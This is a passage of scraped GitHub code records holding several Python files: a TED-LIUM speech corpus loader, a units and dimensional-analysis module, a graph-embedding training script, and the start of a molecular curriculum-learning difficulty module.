Corpus\n\n\nclass TEDLIUM(Corpus):\n\n __version__ = 'v2'\n\n DATASET_URLS = {\n \"train\": [\"http://www.openslr.org/resources/19/TEDLIUM_release2.tar.gz\"],\n \"val\": [\"http://www.openslr.org/resources/19/TEDLIUM_release2.tar.gz\"],\n \"test\": [\"http://www.openslr.org/resources/19/TEDLIUM_release2.tar.gz\"]\n }\n\n def 
__init__(self,\n target_dir='ted_dataset',\n min_duration=1,\n max_duration=15,\n fs=16000,\n name='ted'):\n super().__init__(\n TEDLIUM.DATASET_URLS,\n target_dir,\n min_duration=min_duration,\n max_duration=max_duration,\n fs=fs,\n name=name)\n\n def process_audio(self, audio_path, wav_path):\n shutil.move(audio_path, wav_path)\n\n def get_data(self, root_dir, set_type):\n\n if set_type == 'val':\n set_type = 'dev'\n\n root_dir = os.path.join(root_dir, 'TEDLIUM_release2', set_type)\n\n data = []\n entries = os.listdir(os.path.join(root_dir, 'sph'))\n for sph_file in tqdm(entries, total=len(entries)):\n speaker_name = sph_file.split('.sph')[0]\n\n sph_path = os.path.join(root_dir, 'sph', sph_file)\n stm_path = os.path.join(root_dir, 'stm', '{}.stm'.format(speaker_name))\n\n assert os.path.exists(sph_path) and os.path.exists(stm_path)\n\n all_utterances = self._get_utterances_from_stm(stm_path)\n all_utterances = filter(self._filter_short_utterances, all_utterances)\n\n for utterance_id, utterance in enumerate(all_utterances):\n cut_audio_path = os.path.join(\n root_dir, 'sph', '{}_{}.wav'.format(utterance['filename'], str(utterance_id)))\n self._cut_utterance(sph_path, cut_audio_path, utterance['start_time'],\n utterance['end_time'])\n\n data.append((cut_audio_path, utterance['transcript']))\n\n return data\n\n def _get_utterances_from_stm(self, stm_file):\n \"\"\" Return list of entries containing phrase and its start/end timings\n \"\"\"\n results = []\n with open(stm_file, 'r') as f:\n for stm_line in f:\n tokens = stm_line.split()\n start_time = float(tokens[3])\n end_time = float(tokens[4])\n filename = tokens[0]\n transcript = unicodedata.normalize('NFKD',\n ' '.join(t for t in tokens[6:]).strip()).encode(\n 'utf-8', 'ignore').decode('utf-8', 'ignore')\n if transcript != 'ignore_time_segment_in_scoring':\n results.append({\n 'start_time': start_time,\n 'end_time': end_time,\n 'filename': filename,\n 'transcript': transcript\n })\n return results\n\n def _filter_short_utterances(self, utterance_info, min_len_sec=1.0):\n return utterance_info[\"end_time\"] - utterance_info[\"start_time\"] > min_len_sec\n\n def process_transcript(self, root_dir, transcript_path, audio_path):\n return transcript_path\n\n def _cut_utterance(self, audio_path, target_audio_path, start_time, end_time):\n cmd = \"sox {} -r {} -b 16 -c 1 {} trim {} = {}\".format(\n audio_path, self.fs, target_audio_path, start_time, end_time)\n\n ret_code = subprocess.call(cmd, shell=True)\n\n if ret_code < 0:\n raise RuntimeError('sox was terminated by signal {}'.format(ret_code))\n\n\nif __name__ == \"__main__\":\n parser = utils.get_argparse(os.path.join(os.path.split(os.path.abspath(__file__))[0]))\n args = parser.parse_args()\n\n ted = TEDLIUM(\n target_dir=args.target_dir,\n fs=args.fs,\n max_duration=args.max_duration,\n min_duration=args.min_duration)\n manifest_paths = ted.download(args.files_to_download)\n\n for manifest_path in manifest_paths:\n print('Manifest created at {}'.format(manifest_path))\n","repo_name":"igormq/speech2text","sub_path":"data/ted.py","file_name":"ted.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"} +{"seq_id":"1677479220","text":"\"\"\"Module to handle dimensional analysis\"\"\"\nfrom copy import deepcopy\nfrom math import floor, log10, pi\nfrom typing import Tuple\n\nprefixes = {key-10: value for key, value in enumerate('qryzafpnµm kMGTPEZYRQ')}\nprefixes[0] = '' # set up prefix 
dict\ntemperatures = {\n\t'celsius': ('C', 1, -273.15),\n\t'delisle': ('D', -3/2, 559.725),\n\t'fahrenheit': ('F', 9/5, -459.67),\n\t'kelvin': ('K', 1, 0),\n\t'newton': ('N', 1/3, -91.05),\n\t'planck': ('T_P', 7.058119e-33, 0),\n\t'rankine': ('R', 9/5, 0),\n\t'reaumur': ('Ré', 4/5, -218.52),\n\t'romer': ('Rø', 21/40, -135.90375),\n\t'urist': ('U', 9/5, 9508.33),\n}\n\n\ndef get_si(value: float) -> Tuple[float, str]:\n\t\"\"\"Get SI prefix and adjusted value\"\"\"\n\tif value == 0:\n\t\treturn 0, prefixes[0]\n\tindex = floor(log10(value)/3)\n\tindex = max(min(prefixes), min(max(prefixes), index))\n\tnew_value = value / 10**(3*index)\n\treturn new_value, prefixes[index]\n\n\n# https://stackoverflow.com/a/10854034/2579798\ndef round_time(dt = None, round_to: int = 1):\n\t\"\"\"Round a datetime object to any time lapse in seconds\n\tdt : datetime.datetime object, default now.\n\tround_to : Closest number of seconds to round to, default 1 second.\n\tAuthor: Thierry Husson 2012 - Use it as you want but don't blame me.\n\t\"\"\"\n\timport datetime\n\tif dt is None:\n\t\tdt = datetime.datetime.now()\n\tseconds = (dt.replace(tzinfo=None) - dt.min).seconds\n\trounding = (seconds+round_to/2) // round_to * round_to\n\treturn dt + datetime.timedelta(0, rounding-seconds, -dt.microsecond)\n\n\ndef pretty_dim(multidim, rounding: int=3) -> str:\n\t\"\"\"Prettify dim\"\"\"\n\tval, unit = str(multidim).split(' ')\n\tval = round(float(val), rounding)\n\tif val % 1 == 0:\n\t\tval = int(val)\n\treturn f'{val} {unit}'\n\n\nclass Dimension:\n\t\"\"\"Abstract dimension object\"\"\"\n\tdef __init__(self, value, *tags):\n\t\tself.value = value\n\t\tself.tags = set(tags)\n\n\t# properties\n\t@property\n\tdef copy(self):\n\t\t\"\"\"Returns a deep copy of this object\"\"\"\n\t\treturn deepcopy(self)\n\n\t@property\n\tdef multi(self):\n\t\treturn Multidimension(self.value, {type(self): 1}, *self.tags)\n\n\t# double underscore methods\n\tdef __abs__(self):\n\t\treturn type(self)(abs(self.value), *self.tags)\n\n\tdef __add__(self, other):\n\t\tassert isinstance(self, type(other))\n\t\treturn type(self)(self.value+other.value, *self.tags)\n\n\tdef __bool__(self) -> bool:\n\t\treturn bool(self.value)\n\n\tdef __complex__(self) -> complex:\n\t\treturn complex(self.value)\n\n\tdef __eq__(self, other) -> bool:\n\t\tassert isinstance(self, type(other))\n\t\treturn self.value == other.value\n\n\tdef __float__(self) -> float:\n\t\treturn float(self.value)\n\n\tdef __hash__(self) -> int:\n\t\treturn hash(self.value)\n\n\tdef __int__(self) -> int:\n\t\treturn int(self.value)\n\n\tdef __le__(self, other) -> bool:\n\t\tassert isinstance(self, type(other))\n\t\treturn self.value <= other.value\n\n\tdef __lt__(self, other) -> bool:\n\t\tassert isinstance(self, type(other))\n\t\treturn self.value < other.value\n\n\tdef __mul__(self, other): # returns either type(self) or Multidimension\n\t\tif isinstance(other, Dimension):\n\t\t\treturn self.multi * other.multi\n\t\tif isinstance(other, Multidimension):\n\t\t\treturn self.multi * other\n\t\treturn type(self)(self.value*other, *self.tags)\n\n\tdef __neg__(self):\n\t\treturn type(self)(-self.value, *self.tags)\n\n\tdef __pos__(self):\n\t\treturn self\n\n\tdef __pow__(self, other):\n\t\treturn self.multi ** other\n\n\tdef __repr__(self) -> str:\n\t\treturn f'{type(self).__name__}({self.value}, *{self.tags})'\n\n\tdef __rmul__(self, other):\n\t\treturn self * other\n\n\tdef __rtruediv__(self, other):\n\t\treturn other / self.multi\n\n\tdef __sub__(self, other):\n\t\tassert isinstance(self, 
type(other))\n\t\treturn type(self)(self.value-other.value, *self.tags)\n\n\tdef __truediv__(self, other): # returns either type(self) or Multidimension\n\t\tif isinstance(other, Dimension):\n\t\t\tif isinstance(self, type(other)):\n\t\t\t\treturn self.value / other.value\n\t\t\treturn self.multi / other.multi\n\t\tif isinstance(other, Multidimension): # call rtruediv of Multidimension\n\t\t\treturn self.multi / other\n\t\treturn type(self)(self.value/other, *self.tags)\n\n\nclass Length(Dimension):\n\t# properties\n\t@property\n\tdef astro(self) -> str:\n\t\t\"\"\"Get astronomically-used units\"\"\"\n\t\tx = self.value\n\t\tLD = 3.84402e8\n\t\tau = 1.495978707e11\n\t\tly = 9.4607304725808e15\n\t\tif self.value < au:\n\t\t\treturn str(x/LD) + ' LD'\n\t\tif self.value < ly:\n\t\t\treturn str(x/au) + ' au'\n\t\treturn '{} {}ly'.format(*get_si(x/ly))\n\n\t@property\n\tdef imperial(self) -> str:\n\t\t\"\"\"Get imperial units\"\"\"\n\t\tx = self.value\n\t\tinch = 2.54e-2\n\t\tft = 0.3048\n\t\tyd = 0.9144\n\t\tmi = 1609.344\n\t\tif self.value < ft:\n\t\t\treturn str(x/inch) + ' in'\n\t\tif self.value < yd:\n\t\t\treturn str(x/ft) + ' ft'\n\t\tif self.value < mi:\n\t\t\treturn str(x/yd) + ' yd'\n\t\treturn str(x/mi) + ' mi'\n\n\t# double underscore methods\n\tdef __str__(self) -> str:\n\t\tx = self.value\n\t\tif x < 0:\n\t\t\treturn '-' + str(-self)\n\t\tif 'imperial' in self.tags:\n\t\t\treturn self.imperial\n\t\tif 'astro' in self.tags and 3.84402e8 < x:\n\t\t\treturn self.astro\n\t\treturn '{} {}m'.format(*get_si(x))\n\n\nclass Mass(Dimension):\n\t# properties\n\t@property\n\tdef astro(self) -> str:\n\t\t\"\"\"Get astronomically-used units\"\"\"\n\t\tx = self.value\n\t\tm_m = 7.342e22\n\t\tm_e = 5.97237e24\n\t\tm_j = 1.8982e27\n\t\tm_s = 1.98847e30\n\t\tif self.value < m_e:\n\t\t\treturn str(x/m_m) + ' Lunar Masses'\n\t\tif self.value < m_j:\n\t\t\treturn str(x/m_e) + ' Earth Masses'\n\t\tif self.value < m_s:\n\t\t\treturn str(x/m_j) + ' Jupiter Masses'\n\t\treturn str(x/m_s) + ' Solar Masses'\n\n\t@property\n\tdef imperial(self) -> str:\n\t\t\"\"\"Get imperial units\"\"\"\n\t\tx = self.value\n\t\tlb = .45359237\n\t\toz = lb / 12\n\t\tif self.value < lb:\n\t\t\treturn str(x/oz) + ' oz'\n\t\treturn str(x/lb) + ' lb'\n\n\t# double underscore methods\n\tdef __str__(self) -> str:\n\t\tx = self.value\n\t\tif x < 0:\n\t\t\treturn '-' + str(-self)\n\t\tif 'imperial' in self.tags:\n\t\t\treturn self.imperial\n\t\tif 1e23 < x and 'astro' in self.tags:\n\t\t\treturn self.astro\n\t\treturn '{} {}g'.format(*get_si(x*1000))\n\n\nclass Time(Dimension):\n\t# properties\n\t@property\n\tdef imperial(self) -> str:\n\t\t\"\"\"Get imperial units\"\"\"\n\t\tx = self.value\n\t\tminute = 60\n\t\th = 60*minute\n\t\td = 24*h\n\t\tyr = 365.2425*d\n\t\tif self.value < h:\n\t\t\treturn str(x/minute) + ' min'\n\t\tif self.value < d:\n\t\t\treturn str(x/h) + ' h'\n\t\tif self.value < yr:\n\t\t\treturn str(x/d) + ' d'\n\t\treturn '{} {}yr'.format(*get_si(x/yr))\n\n\t# double underscore methods\n\tdef __str__(self) -> str:\n\t\tx = self.value\n\t\tif x < 0:\n\t\t\treturn '-' + str(-self)\n\t\tif 'imperial' in self.tags and 60 <= x:\n\t\t\treturn self.imperial\n\t\treturn '{} {}s'.format(*get_si(x))\n\n\nclass Temperature(Dimension):\n\t# double underscore methods\n\tdef __str__(self) -> str:\n\t\tfor name, (sym, scalar, offset) in temperatures.items():\n\t\t\tif name in self.tags:\n\t\t\t\treturn '{} {}{}'.format(scalar * self.value + offset, '°' if offset else '', sym)\n\t\treturn '{} K'.format(self.value)\n\n\nclass 
Current(Dimension):\n\t# double underscore methods\n\tdef __str__(self) -> str:\n\t\tx = self.value\n\t\tif x < 0:\n\t\t\treturn '-' + str(-self)\n\t\treturn '{} {}A'.format(*get_si(x))\n\n\nclass Angle(Dimension):\n\t# properties\n\t@property\n\tdef degrees(self) -> str:\n\t\t\"\"\"Get value in degrees, arcminutes, and arcseconds\"\"\"\n\t\tx = self.value\n\t\tdeg = pi/180\n\t\tarcmin = deg / 60\n\t\tarcsec = arcmin / 60\n\t\tif deg < self.value:\n\t\t\treturn str(x/deg) + '°'\n\t\tif arcmin < self.value:\n\t\t\treturn str(x/arcmin) + '′'\n\t\tif arcsec < self.value:\n\t\t\treturn str(x/arcsec) + '″'\n\t\treturn '{} {}as'.format(*get_si(x/arcsec))\n\n\t# double underscore methods\n\tdef __str__(self) -> str:\n\t\tx = self.value\n\t\tif x < 0:\n\t\t\treturn '-' + str(-self)\n\t\tif 'deg' in self.tags:\n\t\t\treturn self.degrees\n\t\treturn '{} {}rad'.format(*get_si(x))\n\n\nquantities = [\n\t({Length: 1, Time: -2}, 'Acceleration', 'm/s^2'),\n\t({Length: 2, Mass: 1, Time: -1}, 'Angular Momentum', 'N*m*s'),\n\t({Length: 2}, 'Area', 'm^2'),\n\t({Length: -3, Mass: 1}, 'Density', 'kg/m^3'),\n\t({Length: 2, Mass: 1, Time: -2}, 'Energy', 'J'),\n\t({Length: 1, Mass: 1, Time: -2}, 'Force', 'N'),\n\t({Length: 1, Mass: 1, Time: -1}, 'Momentum', 'N*s'),\n\t({Time: -1}, 'Frequency', 'Hz'),\n\t({Length: 2, Mass: 1, Time: -3}, 'Power', 'W'),\n\t({Length: -1, Mass: 1, Time: -2}, 'Pressure', 'Pa'),\n\t({Length: 1, Time: -1}, 'Speed', 'm/s'),\n\t({Length: 3}, 'Volume', 'm^3'),\n\t# w/ temperature\n\t({Length: 2, Mass: 1, Temperature: -1, Time: -2}, 'Entropy', 'J/K'),\n\t# w/ current\n\t({Current: 1, Time: 1}, 'Electric Charge', 'C'),\n\t({Current: 2, Length: -2, Mass: -1, Time: 4}, 'Electrical Capacitance', 'F'),\n\t({Current: 2, Length: -2, Mass: -1, Time: 3}, 'Electrical Conductance', 'S'),\n\t({Current: -2, Length: 2, Mass: 1, Time: -2}, 'Electrical Inductance', 'H'),\n\t({Current: -2, Length: 2, Mass: 1, Time: -3}, 'Electrical Resistance', 'Ω'),\n\t({Current: -1, Length: 2, Mass: 1, Time: -2}, 'Magnetic Flux', 'Wb'),\n\t({Current: -1, Mass: 1, Time: -2}, 'Magnetic Induction', 'T'),\n\t({Current: -1, Length: 2, Mass: 1, Time: -3}, 'Voltage', 'V'),\n]\n\n\nclass Multidimension:\n\tdef __init__(self, value: float, dimensions: dict, *tags):\n\t\tself.value = value\n\t\tself.dimensions = dimensions # type dict Class -> int\n\t\tself.tags = set(tags)\n\n\t# properties\n\t@property\n\tdef clean(self):\n\t\t\"\"\"Delete units with 0\"\"\"\n\t\tnew = self.copy\n\t\tnew.dimensions = {key: value for key, value in self.dimensions.items() if value}\n\t\treturn new\n\n\t@property\n\tdef copy(self):\n\t\t\"\"\"Returns a deep copy of self\"\"\"\n\t\treturn deepcopy(self)\n\n\t@property\n\tdef inverse(self):\n\t\t\"\"\"1/this\"\"\"\n\t\tnew = self.copy\n\t\tnew.value = 1/self.value\n\t\tnew.dimensions = {key: -value for key, value in self.dimensions.items()}\n\t\treturn new\n\n\t# properties\n\t@property\n\tdef quantity(self) -> str:\n\t\t\"\"\"Attempt to fetch the name\"\"\"\n\t\tfor dim, name, _ in quantities:\n\t\t\tif dim == self.clean.dimensions:\n\t\t\t\treturn name\n\t\traise KeyError\n\n\t@property\n\tdef unit(self) -> str:\n\t\t\"\"\"Attempt to fetch the unit\"\"\"\n\t\tfor dim, _, unit in quantities:\n\t\t\tif dim == self.clean.dimensions:\n\t\t\t\treturn unit\n\t\traise KeyError(self.dimensions)\n\n\t# double underscore methods\n\tdef __add__(self, other):\n\t\tassert self.dimensions == other.dimensions\n\t\treturn Multidimension(self.value + other.value, self.dimensions, *self.tags)\n\n\tdef __mul__(self, 
other):\n\t\tif isinstance(other, Dimension):\n\t\t\treturn self * other.multi\n\t\tif isinstance(other, Multidimension):\n\t\t\tdimensions = self.dimensions.copy()\n\t\t\tfor dimension, i in other.dimensions.items():\n\t\t\t\tif dimension in dimensions:\n\t\t\t\t\tdimensions[dimension] += i\n\t\t\t\telse:\n\t\t\t\t\tdimensions[dimension] = i\n\t\t\treturn Multidimension(self.value * other.value, dimensions, *self.tags)\n\t\treturn Multidimension(self.value*other, self.dimensions, *self.tags)\n\n\tdef __neg__(self):\n\t\treturn Multidimension(-self.value, self.dimensions, *self.tags)\n\n\tdef __pos__(self):\n\t\treturn self\n\n\tdef __pow__(self, other):\n\t\tassert isinstance(other, int)\n\t\treturn Multidimension(self.value**other, {t: other*i for t, i in self.dimensions.items()}, *self.tags)\n\n\tdef __repr__(self) -> str:\n\t\treturn f'Multidimension({self.value}, {self.dimensions}, *{self.tags})'\n\n\tdef __rtruediv__(self, other):\n\t\treturn Multidimension(other, {}, *self.tags) / self\n\n\tdef __str__(self) -> str:\n\t\tx = self.value\n\t\tif x < 0:\n\t\t\treturn '-' + str(-self)\n\t\tval, prefix = get_si(x)\n\t\treturn f'{val} {prefix}{self.unit}'\n\n\tdef __sub__(self, other):\n\t\treturn self + -other\n\n\tdef __truediv__(self, other): # possibilities: other is number or dimension\n\t\tdimensions = self.dimensions.copy()\n\t\tif isinstance(other, Dimension):\n\t\t\treturn self / other.multi\n\t\tif isinstance(other, Multidimension):\n\t\t\treturn self * other.inverse\n\t\treturn Multidimension(self.value / other, dimensions, *self.tags) # divide the value by the plain number, not the other way around\n","repo_name":"Mocha2007/mochalib","sub_path":"mochaunits.py","file_name":"mochaunits.py","file_ext":"py","file_size_in_byte":11371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10675577819","text":"from __future__ import division\nfrom __future__ import print_function\n\nfrom optimizer import OptimizerTargetOne, OptimizerTargetTwo\nfrom input_data import load_data\nfrom model import TargetOneModel, TargetTwoModel\nfrom preprocessing import preprocess_graph, construct_feed_dict, sparse_to_tuple\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import f1_score, accuracy_score\nfrom sklearn.multiclass import OneVsRestClassifier\n\nimport tensorflow as tf\nimport numpy as np\nimport scipy.sparse as sp\n\nimport time\nimport os\n\n# Train on CPU (hide GPU) due to memory constraints\nos.environ['CUDA_VISIBLE_DEVICES'] = \"\"\n\n\n# Settings\nflags = tf.app.flags\nFLAGS = flags.FLAGS\nflags.DEFINE_float('learning_rate_target_one', 0.01, 'Initial learning rate for learning target 1.')\nflags.DEFINE_float('learning_rate_target_two', 0.01, 'Initial learning rate for learning target 2.')\nflags.DEFINE_integer('target_one_epochs', 300, 'Number of epochs to train for learning-target-one model.')\nflags.DEFINE_integer('target_two_epochs', 300, 'Number of epochs to train for learning-target-two model.')\nflags.DEFINE_integer('hidden1', 1000, 'Number of units in hidden layer 1.')\nflags.DEFINE_integer('hidden2', 200, 'Number of units in hidden layer 2.')\nflags.DEFINE_float('dropout', 0.5, 'Dropout rate (1 - keep probability).')\nflags.DEFINE_float('weight_integration', 0.5, 'Weight for integration for embeddings of learning-target-two model.')\nflags.DEFINE_string('dataset', 'citeseer', 'Dataset string.')\n\ndataset_str = FLAGS.dataset\n\n# Load data\nadj, features, y_train, train_mask, y_all = 
load_data(dataset_str)\n\nadj = adj - sp.dia_matrix((adj.diagonal()[np.newaxis, :], [0]), shape=adj.shape)\nadj.eliminate_zeros()\n\n# Spectral transform of adjacency matrix\nadj_norm = preprocess_graph(adj)\n\n# Define placeholders\nplaceholders = {\n 'features': tf.sparse_placeholder(tf.float32),\n 'adj_orig': tf.sparse_placeholder(tf.float32),\n 'dropout': tf.placeholder_with_default(0., shape=()),\n 'labels': tf.placeholder(tf.float32),\n 'labels_mask': tf.placeholder(tf.int32)\n}\n\nnum_nodes = adj.shape[0]\n\nfeatures = adj_norm\nnum_features = features[2][1]\nfeatures_nonzero = features[1].shape[0]\n\n# Create models\ntarget_one_model = TargetOneModel(placeholders, num_features, features_nonzero)\ntarget_two_model = TargetTwoModel(placeholders, num_features, features_nonzero, y_train.shape[1])\n\n# Reweights for terms in learning-target-one model's cross entropy loss\npos_weight = float(adj.shape[0] * adj.shape[0] - adj.sum()) / adj.sum()\nnorm = adj.shape[0] * adj.shape[0] / float((adj.shape[0] * adj.shape[0] - adj.sum()) * 2)\n\n\ndef check_multi_label_classification(Y, emb, test_ratio):\n def small_trick(y_test, y_pred):\n y_pred_new = np.zeros(y_pred.shape, np.bool)\n sort_index = np.flip(np.argsort(y_pred, axis=1), 1)\n for i in range(y_test.shape[0]):\n num = int(sum(y_test[i]))\n for j in range(num):\n y_pred_new[i][sort_index[i][j]] = True\n return y_pred_new\n\n x_train, x_test, y_train, y_test = train_test_split(emb, Y, test_size=test_ratio)\n clf = OneVsRestClassifier(LogisticRegression())\n clf.fit(x_train, y_train)\n\n y_pred = clf.predict_proba(x_test)\n ## small trick : we assume that we know how many label to predict\n y_pred = small_trick(y_test, y_pred)\n\n # micro = f1_score(y_test, y_pred, average=\"micro\")\n # macro = f1_score(y_test, y_pred, average=\"macro\")\n # return \"micro_f1: %.4f macro_f1 : %.4f\" % (micro, macro)\n accuracy = accuracy_score(y_test, y_pred, normalize=True)\n return \"accuracy: %.4f\" % accuracy\n\n# Target one optimizer\nwith tf.name_scope('optimizer_for_target_one'):\n opt = OptimizerTargetOne(preds=target_one_model.reconstructions,\n labels=tf.reshape(tf.sparse_tensor_to_dense(placeholders['adj_orig'], validate_indices=False), [-1]),\n pos_weight=pos_weight,\n norm=norm)\n\n# Initialize session\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\nadj_label = adj + sp.eye(adj.shape[0])\nadj_label = sparse_to_tuple(adj_label)\n\nfeed_dict = construct_feed_dict(adj_label, features, placeholders)\nfeed_dict.update({placeholders['dropout']: FLAGS.dropout})\n\n# Train learning-target-one model\nfor epoch in range(FLAGS.target_one_epochs):\n\n t = time.time()\n\n outs = sess.run([opt.opt_op, opt.cost, opt.accuracy], feed_dict=feed_dict)\n\n # Compute average loss\n avg_cost = outs[1]\n avg_accuracy = outs[2]\n\n print(\"Epoch:\", '%04d' % (epoch + 1), \"train_loss=\", \"{:.2f}\".format(avg_cost / 100000),\n \"train_acc=\", \"{:.5f}\".format(avg_accuracy), \"time=\", \"{:.5f}\".format(time.time() - t))\n\nprint(\"Optimization Finished for Learning-target-one model!\")\n\nfeed_dict.update({placeholders['dropout']: 0})\ntarget_one_emb = sess.run(target_one_model.z_mean, feed_dict=feed_dict)\n\nprint('Test Classification (training set 10%) for Learning-target-one model: ' + check_multi_label_classification(y_all, target_one_emb, test_ratio=0.9))\n\nprint(\"----------------------------------------------------------------------------------------------------------\")\n\n# Target two optimizer\nwith 
tf.name_scope('optimizer_for_target_two'):\n opt = OptimizerTargetTwo(preds=target_two_model.outputs,\n labels=target_two_model.labels,\n masks=target_two_model.labels_mask)\n\n# Initialize session\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\nfeed_dict = dict()\nfeed_dict.update({placeholders['labels']: y_train})\nfeed_dict.update({placeholders['labels_mask']: train_mask})\nfeed_dict.update({placeholders['dropout']: FLAGS.dropout})\nfeed_dict.update({placeholders['features']: features})\n\n# Train learning-target-two model\nfor epoch in range(FLAGS.target_two_epochs):\n\n t = time.time()\n\n outs = sess.run([opt.opt_op, opt.cost, opt.accuracy], feed_dict=feed_dict)\n\n # Compute average loss\n avg_cost = outs[1]\n avg_accuracy = outs[2]\n\n print(\"Epoch:\", '%04d' % (epoch + 1), \"train_loss=\", \"{:.5f}\".format(avg_cost),\n \"train_acc=\", \"{:.5f}\".format(avg_accuracy))\n\nprint(\"Optimization Finished for Learning-target-two model!\")\n\nfeed_dict.update({placeholders['dropout']: 0})\ntarget_two_emb_1st_hidden_layer = sess.run(target_two_model.hidden1, feed_dict=feed_dict)\nprint('Test Classification (training set 10%) for 1st hidden layer of Learning-target-two model: ' + check_multi_label_classification(y_all, target_two_emb_1st_hidden_layer, test_ratio=0.9))\n\nfeed_dict.update({placeholders['dropout']: 0})\ntarget_two_emb_2nd_hidden_layer = sess.run(target_two_model.embeddings, feed_dict=feed_dict)\nprint('Test Classification (training set 10%) for 2nd hidden layer(embedding) of Learning-target-two model: ' + check_multi_label_classification(y_all, target_two_emb_2nd_hidden_layer, test_ratio=0.9))\n\nprint(\"----------------------------------------------------------------------------------------------------------\")\n\nintegrated_emb = (1 - FLAGS.weight_integration) * target_one_emb + FLAGS.weight_integration * target_two_emb_2nd_hidden_layer\nprint('Test Classification (training set 10%) for the integrated embeddings: ' + check_multi_label_classification(y_all, emb=integrated_emb, test_ratio=0.9))\n","repo_name":"waspzby/elne","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36165681568","text":"import random\nimport numpy as np\nfrom torch.utils.data import Sampler\nfrom rdkit import Chem\nimport copy\nfrom torch.optim import Adam\nfrom rdkit.Chem import AllChem, rdMolDescriptors\nfrom utils import load_model, predict, criterion\nfrom dgllife.utils import RandomSplitter\n\n\ndef cal_diff_feat(args, dataset, train_set):\n \"\"\"\n Calculate difficulty coefficients for training set based on selected difficulty measurer.\n Args:\n dataset: The whole dataset.\n train_set: The training set.\n Returns:\n The numpy array of difficulty coefficients for training set.\n \"\"\"\n smiles = np.array(dataset.smiles)[train_set.indices]\n label = dataset.labels.numpy().squeeze()[train_set.indices]\n diff_feat = []\n if args['diff_type'] in ['LabelDistance', 'Joint', 'Two_stage']:\n pred = train4LabelDistance(args, train_set)\n else:\n pred = [None] * len(smiles)\n print('Difficult Calculate Method: ', args['diff_type'])\n for idx in range(len(smiles)):\n diff = Feat_Calculate(smiles[idx], args['diff_type'], label[idx], pred[idx])\n diff_feat.append(diff.diff_feat)\n return np.array(diff_feat)\n\n\ndef train4LabelDistance(args, train_set):\n \"\"\"\n Acquire the predictions of training set which is used in d_LabelDistance 
difficulty measurer.\n    Args:\n        train_set: The training set.\n    Returns:\n        The prediction results of k teacher models.\n    \"\"\"\n    from load_data import load_data\n    from train import eval_iteration\n    print('LabelDistance Training...')\n    args_ = copy.deepcopy(args)\n    args_['is_Curr'] = False\n    model = load_model(args).to(args_['device'])\n    loss_criterion = criterion(args_)\n    optimizer = Adam(model.parameters(), lr=args_['lr'],\n                     weight_decay=args_['weight_decay'])\n    if args['n_tasks'] > 1:\n        pred = np.zeros((len(train_set), args['n_tasks']))\n    else:\n        pred = np.zeros(len(train_set))\n    for train, test in RandomSplitter.k_fold_split(train_set, k=3,\n                                                   random_state=args_['seed']):\n        print('length of train data:', len(train))\n        args_['t_total'] = int(100 * len(train) / args['batch_size'])\n        train_loader, _, test_loader = load_data(args_, train,\n                                                 None, test, None)\n        model.train()\n        iter_count = 0\n        for i in range(999):\n            if iter_count == args['t_total']:\n                break\n            for batch_id, batch_data in enumerate(train_loader):\n                smiles, bg, labels, masks = batch_data\n                if len(smiles) == 1:\n                    # Avoid potential issues with batch normalization\n                    continue\n                labels, masks = labels.to(args['device']), masks.to(args['device'])\n                prediction = predict(args, model, bg)\n                # Mask non-existing labels\n                loss = (loss_criterion(prediction, labels) * (masks != 0).float()).mean()\n                optimizer.zero_grad()\n                loss.backward()\n                optimizer.step()\n                model.train()\n                if iter_count % int(len(train) / 5) == 0:\n                    print('iteration {:d}/{:d}, loss {:.4f}'.format(\n                        iter_count, args_['t_total'], loss.item()))\n                if iter_count == args_['t_total']:\n                    break\n                iter_count += 1\n        _, pred[test.indices] = eval_iteration(args, model, test_loader)\n    return pred\n\n\ndef read_smiles(smi):\n    \"\"\"\n    Parse a molecule from a SMILES string.\n    Args:\n        smi: The SMILES string of the molecule.\n    Returns:\n        The rdkit rdMol object based on the input SMILES.\n    \"\"\"\n    rdkit_mol = AllChem.MolFromSmiles(smi)\n    if rdkit_mol is None:\n        rdkit_mol = AllChem.MolFromSmiles(smi, sanitize=False)\n    return rdkit_mol\n\n\nclass Feat_Calculate:\n    def __init__(self, smiles, curr_option, label, pred):\n        \"\"\"\n        Input SMILES strings and the difficulty coefficient calculation option\n        Args:\n            smiles: The SMILES whose difficulty coefficient is to be calculated.\n            curr_option: The option for the Curr_learning, choice\n                         from [AtomAndBond, Fsp3, MCE18, LabelDistance, Joint, Two_Stage]\n                         The string of the choice for the feature calculation\n            label: The true label of training set for d_LabelDistance.\n            pred: The predictions of training set for d_LabelDistance.\n        \"\"\"\n        self.mol = read_smiles(smiles)\n        self.label = label\n        self.pred = pred\n        self.curr_option = curr_option\n        if self.curr_option == 'AtomAndBond':\n            self.diff_feat = self.calculate_atom_and_bond()\n        elif self.curr_option == 'Fsp3':\n            self.diff_feat = self.calculate_sp3idx()\n        elif self.curr_option == 'MCE18':\n            self.diff_feat = self.calculate_MCE18()\n        elif self.curr_option == 'LabelDistance':\n            self.label = label\n            self.pred = pred\n            self.diff_feat = self.calculate_LabelDistance()\n        elif self.curr_option in ['Joint', 'Two_stage']:\n            self.diff_feat = [self.calculate_atom_and_bond(),\n                              self.calculate_sp3idx(),\n                              self.calculate_MCE18(),\n                              self.calculate_LabelDistance()]\n        elif self.curr_option == 'None':\n            self.diff_feat = []\n        elif self.curr_option == 'Ablation':\n            self.diff_feat = random.random()\n        else:\n            self.diff_feat = None\n\n    def calculate_atom_and_bond(self):\n        \"\"\"\n        Calculate the summation of the atom number and bond number\n        
